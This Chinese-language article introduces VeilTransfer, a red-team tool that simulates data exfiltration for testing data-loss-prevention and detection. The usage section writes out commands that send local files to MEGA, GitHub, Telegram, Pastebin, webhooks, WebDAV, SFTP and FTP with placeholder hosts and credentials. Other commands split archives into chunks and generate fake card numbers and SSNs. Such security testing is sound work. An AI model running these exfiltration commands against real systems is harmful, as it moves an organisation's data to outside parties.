关于VeilTransfer
VeilTransfer是一款功能强大的企业数据安全检测与增强工具,该工具基于Go语言开发,旨在帮助广大研究人员完成企业环境下的数据安全测试并增强检测能力。
此工具模拟了高级威胁行为者使用的真实数据泄露技术,使组织能够评估和改善其安全状况。通过利用多种泄露方法(例如 MEGA、Github、SFTP、WebDAV 等),VeilTransfer 可帮助识别防御漏洞并确保您的安全解决方案已准备好应对现代数据泄露。
功能介绍
当前版本的VeilTransfer支持下列数据提取方法与对象:
1、MEGA
2、Github
3、Telegram
4、Pastebin
5、WebDAV
6、Webhook
7、SFTP
8、FTP
工具场景
1、红队活动:在红队演习期间部署 VeilTransfer,以复杂而逼真的撤离场景挑战蓝队。
2、紫队活动:与您的防御团队合作,模拟并检测撤离企图,改进进攻和防御战术。
3、安全测试:使用 VeilTransfer 验证数据丢失防护 (DLP) 解决方案、防火墙和其他网络安全措施的有效性。
工具要求
Go语言运行环境
工具安装
由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好最新版本的Go环境。
接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
https://github.com/infosecn1nja/VeilTransfer.git
工具使用
通过 SFTP 传输文件
此示例演示如何使用 SFTP 协议安全地将文件传输到远程服务器。该文件位于本地计算机上,并使用 SSH 身份验证将其传输到指定的远程目录。
VeilTransfer transfer -method sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass
传输文件到 WebDAV 服务器
在此示例中,本地目录中的文件被上传到 WebDAV 服务器。服务器需要用户名和密码进行身份验证。服务器参数包括 URI 方案(https:// 或 http://)。
VeilTransfer transfer -method webdav -localPath /path/to/directory -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass
将文件传输至 Mega Cloud
此示例显示如何将文件传输到 Mega Cloud 存储。文件从指定的本地目录上传,并使用用户的 Mega Cloud 凭据进行身份验证。
VeilTransfer transfer -method mega -localPath (/path/to/file or /path/to/directory) -username megauser@example.com -password megasecretpassword
通过 FTP 传输文件
在此示例中,将文件上传到 FTP 服务器。该文件被传输到远程服务器上的特定目录。服务器需要用户名和密码进行身份验证。
VeilTransfer transfer -method ftp -localPath (/path/to/file or /path/to/directory) -remoteDir remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword
将文件上传到 Pastebin
此示例演示如何将文件内容上传到 Pastebin。使用用户提供的 API 密钥将内容发布到 Pastebin。
VeilTransfer transfer -method pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key
发送文件到 Github 仓库
此示例显示如何将文件从本地计算机推送到特定的 GitHub 存储库。使用用户的 GitHub API 令牌进行身份验证将文件添加到存储库。
VeilTransfer transfer -method github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token
发送文件到 Telegram 频道
此示例演示如何将文件发送到特定 Telegram 频道。使用 Telegram 机器人 API 令牌发送文件,并将消息传递到指定的频道 ID。
VeilTransfer transfer -method telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789
将数据发送到 Webhook URL
在此示例中,文件的内容被发送到指定的 Webhook URL。
VeilTransfer transfer -method webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url
创建一个简单的 Zip 文件
此示例显示如何从指定目录创建 zip 文件。输出是包含目录中所有文件的单个 zip 文件。
VeilTransfer create-zip -localPath /path/to/directory -outputPath /path/to/output.zip
创建拆分 Zip 文件
此示例演示如何创建拆分为多个部分的 zip 文件,每个部分的大小不超过指定的大小。这对于以较小的块传输大文件非常有用。
VeilTransfer create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000
生成 100 个虚假金融卡号
此示例显示如何生成 100 条虚假金融卡数据。生成的数据将包括金融卡号、有效期和相关详细信息。
VeilTransfer generate-fake -ccn -count 100
生成 50 个虚假的印尼 KTP 条目
此示例演示如何生成 50 条伪造的 KTP 数据(即印度尼西亚身份证)。数据包括姓名、地址和 KTP 号码等个人信息。
VeilTransfer generate-fake -ktp -count 50
生成 200 个虚假社会安全号码
此示例显示如何生成 200 条虚假 SSN 数据。这对于需要大量美国社会安全号码数据集的应用程序非常有用。
VeilTransfer generate-fake -ssn -count 200
许可证协议
本项目的开发与发布遵循GPL-3.0开源许可协议。
项目地址
VeilTransfer:【GitHub传送门】